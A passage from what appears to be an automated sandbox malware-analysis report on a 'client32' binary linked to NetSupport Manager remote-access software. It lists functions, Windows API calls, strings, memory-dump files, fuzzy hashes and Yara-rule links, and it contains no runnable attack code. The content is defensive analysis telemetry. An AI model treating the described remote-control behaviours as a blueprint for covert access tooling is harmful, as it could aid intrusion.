                                                                                                                                                                                • Opcode Fuzzy Hash: 12ab4e151833c8805a57f749dcce1cd84448ef635fb19afac17aafbdf13c20b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                                                                                                                Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteObject$PaletteSelect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2820294704-0
                                                                                                                                                                                • Opcode ID: 724962df2996b1b11af43e2d08959ea70daad812cc66bd29cd992dea1526cb3e
                                                                                                                                                                                • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                                                                                                                • Opcode Fuzzy Hash: 724962df2996b1b11af43e2d08959ea70daad812cc66bd29cd992dea1526cb3e
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                                                                                                                Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                                                                                                                  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                                                                                                                  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                                                                                                                • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                                                                                                                • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                                                                                                                Strings
                                                                                                                                                                                • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                                                                                                                • Global\Client32Provider, xrefs: 1104F1BB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                                                                                                                • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                                                                                                                • API String ID: 3682529815-1899068400
                                                                                                                                                                                • Opcode ID: 5677b653da995a9552b11581cea653e28fd746a45aa4cb83fe07ed7485e689c0
                                                                                                                                                                                • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                                                                                                                • Opcode Fuzzy Hash: 5677b653da995a9552b11581cea653e28fd746a45aa4cb83fe07ed7485e689c0
                                                                                                                                                                                • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                                                                                                                Function 11091590 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 203COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                • String ID: Client$DisableFileTransfer$NoFTWhenLoggedOff
                                                                                                                                                                                • API String ID: 4104443479-3289604943
                                                                                                                                                                                • Opcode ID: 581fb6936f2b2f3a72040dea002551f8b50592e8451a6f93590eedd5274e5344
                                                                                                                                                                                • Instruction ID: 0252cec109c0e785d63a2ef0976ccf74c6b56bff064b3aa3d49bb307559bc9b4
                                                                                                                                                                                • Opcode Fuzzy Hash: 581fb6936f2b2f3a72040dea002551f8b50592e8451a6f93590eedd5274e5344
                                                                                                                                                                                • Instruction Fuzzy Hash: C661F735F0428E9BCB11CE64D860BEEF3F5BB84374F54056ED85A9B344EA309802E791
                                                                                                                                                                                Function 1101B530 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,2520CF5D,?,?,?,1117EE88,000000FF), ref: 110DEB61
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1101B776
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                                                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                                                                                Strings
                                                                                                                                                                                • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                                                                                                • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterException@8SectionThrowXinvalid_argumentstd::_std::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                                                                                • API String ID: 1140503239-623348194
                                                                                                                                                                                • Opcode ID: f4c583c4616e81fc43626d676cdcef91bf1ba38af332c8ec88de562a0d011880
                                                                                                                                                                                • Instruction ID: 313145241459198f779357a328d1d68da5b9e0b2c9cf8edbdce05bc2938c9efa
                                                                                                                                                                                • Opcode Fuzzy Hash: f4c583c4616e81fc43626d676cdcef91bf1ba38af332c8ec88de562a0d011880
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E718FB5D00349DFEB10CFA4C844BDDFBB8AF19318F244559E415AB381DB79AA44CB91
                                                                                                                                                                                Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                                                  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                                                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                                                                                                                  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                                                                                                                  • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                                                                                                                  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                                                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                                                                                                                  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                                                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                                                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11053483
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 2181554437-3415836059
                                                                                                                                                                                • Opcode ID: 72ecce781f593d636d6f2e5df2a427ea7a815f5af96a1c5d62efef5311809fb0
                                                                                                                                                                                • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                                                                                                                • Opcode Fuzzy Hash: 72ecce781f593d636d6f2e5df2a427ea7a815f5af96a1c5d62efef5311809fb0
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                                                                                                                Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: General$TicklePeriod
                                                                                                                                                                                • API String ID: 536389180-1546705386
                                                                                                                                                                                • Opcode ID: ff34866f68eab851375edcd82096540769cbedb854cb0eab2a8d7615860eba58
                                                                                                                                                                                • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                                                                                                                • Opcode Fuzzy Hash: ff34866f68eab851375edcd82096540769cbedb854cb0eab2a8d7615860eba58
                                                                                                                                                                                • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                                                                                                                Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                                                                                                                                • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 110774FE
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 2755825785-2830328467
                                                                                                                                                                                • Opcode ID: e023fce2dbbbdf451216cd64bb70012d1b8ddaa1c7c23afb1a5822b55de3ddb1
                                                                                                                                                                                • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                                                                                                                                • Opcode Fuzzy Hash: e023fce2dbbbdf451216cd64bb70012d1b8ddaa1c7c23afb1a5822b55de3ddb1
                                                                                                                                                                                • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                                                                                                                                Function 11049690 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 11049779
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLTCONN.CPP, xrefs: 11049708
                                                                                                                                                                                • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                                                                                                                • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                                                                                                • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                                                                                                                • API String ID: 2441568934-3188990991
                                                                                                                                                                                • Opcode ID: 0a60dfc6c0897bdad86cae1b24695a701798cac9001b8735ddf298342036da64
                                                                                                                                                                                • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a60dfc6c0897bdad86cae1b24695a701798cac9001b8735ddf298342036da64
                                                                                                                                                                                • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                                                                                                                                Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _memmove.LIBCMT ref: 110D1378
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
